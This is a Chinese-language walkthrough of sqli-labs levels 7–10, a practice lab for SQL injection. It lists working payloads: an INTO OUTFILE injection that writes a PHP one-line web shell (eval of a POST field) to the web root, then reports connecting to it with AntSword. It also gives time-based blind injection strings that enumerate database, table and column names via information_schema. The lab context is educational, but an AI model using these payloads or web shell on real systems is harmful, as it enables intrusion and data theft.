SQL注入详解 7

详解 7"/>

SQL注入详解 7

目录

• • Less-7（outfile 导入文件）
  • Less-8（布尔盲注+时间盲注）
  • Less-9（时间盲注）
  • Less-10（时间盲注）

Less-7（outfile 导入文件）

第七关总结：
第七关的标题为dump into outfile,这表明我们需要利用文件导入来进行注入，这里首先需要判断注入类型，然后导入的路径我们可以根据前几关来确定，在真实环境我们可以利用报错来得到一些路径，也可以判断服务器的类型，根据网站的默认路径等来获得绝对路径

1. 判断注入类型

1'
1')) and 1=1--+
1')) and 1=2--+

2. 导入一句话木马

-1')) union select 1,"<?php @eval($_POST[shell]); ?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\sqllabs\\Less-7\\shell.php"--+

3. 蚁剑连接成功
   

Less-8（布尔盲注+时间盲注）

第八关总结：
通过测试，第八关这里考察的是sql盲注，但是这里限制了报错注入，我们只能通过布尔盲注和时间盲注来确定，具体操作与第五关一样

猜解思路：
1. 猜解当前数据库名长度
2. 猜解数据库名（二分法猜解）
3. 猜解当前数据库中表的个数
4. 猜解每个表名的长度
5. 猜解表名（二分法猜解）
6. 猜解某个表中列的个数
7. 猜解每个列名的长度
8. 猜解列名（二分法猜解）
9. 猜解某个列中数据的个数
10. 采集每个数据的长度
11. 猜解收据（二分法猜解）

Less-9（时间盲注）

第九关总结：
第九关也是属于盲注类型，这个盲注由于不能明确的判断出字段数（因为这里的回显不改变，都是You are in… 从而无法判断），我们在这里可以进行时间盲注

开挂（查看源码）：

1. 判断注入类型
   等待5s才得到返回页面，说明注入类型是单引号字符型
   

2. 判断当前数据库名长度

1' and if((length(database())=8),sleep(5),1)--+

3. 猜解数据库名（二分法猜解，这里只猜解了一个字母，其他的类似）

1' and if((ascii(substr((select database()),1,1))=115),sleep(5),1)--+

4. 猜解当前数据库表的数量

1' and if(((select count(table_name) from information_schema.tables where table_schema='security')=4),sleep(5),1)--+

5. 猜解表名的长度（这里只猜解了第一个表明的长度）

1' and if(((length(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)))=6),sleep(5),1)--+

6. 猜解表名（这里只对表名的第一个字母进行了猜解）

1' and if(((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101),sleep(5),1)--+

7. 猜解列名与数据的方法与猜解表明的方法相同，这里不做过多讲述

Less-10（时间盲注）

第十关总结：
第十关能判断出注入类型，但是不能够判断字段数，回显始终保持不变，所以这里我们只能进行和第九关一毛一样的时间盲注，只是将其符号变为双引号

1. 判断注入类型

1" and sleep(4)--+

2. 无法判断字段数

1" and order by 100000--+

3. 剩余步骤注入可以查看第九关